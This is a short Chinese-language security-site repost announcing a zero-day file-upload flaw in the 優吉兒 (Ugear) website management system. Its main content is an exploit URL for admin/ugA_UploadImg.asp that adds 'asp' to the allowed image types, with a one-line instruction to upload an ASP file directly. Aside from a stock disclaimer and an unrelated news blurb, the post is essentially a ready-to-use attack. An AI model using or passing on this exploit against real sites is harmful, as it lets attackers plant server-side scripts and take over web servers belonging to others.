優吉兒網站管理系统文件上传漏洞 ODAY - 脚本漏洞

admin 2021年4月3日19:37:14评论131 views字数 427阅读1分25秒阅读模式

By:黑小子

官方网站 http://www.ugear.com.tw/

優吉兒網站管理系统 ODAY - 脚本漏洞(Scripts Bugs)

Exp:

admin/ugA_UploadImg.asp?
hidfrmN=frmUG&hidtxtN=txtImgPath02&hidImgP=ImgSynLife&hidFileName=&hid
ReName=Y&hidReturn=Y&hidImgSize=400,533,160,120&hidFileSize=&hidImgTyp
e=jpg,jpeg,jpe,asp

直接上传ASP,然后查看源文件。。即可。

文章来源于lcx.cc:優吉兒網站管理系统文件上传漏洞 ODAY - 脚本漏洞

相关推荐: 美国推出U盘大小的电脑 可播高清影片

美国Oval Elephant近日推出了一款只有U盘大小的迷你电脑。这款产品的外观与一个U盘无异,只是USB接口换成了HDMI。产品可以直接通过HDMI接口连接显示器,组成一台临时的电脑来使用。 这款U盘PC运行的是谷歌的安卓4.0冰淇淋三文治系统,搭载一块1…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:37:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   優吉兒網站管理系统文件上传漏洞 ODAY - 脚本漏洞https://cn-sec.com/archives/323932.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息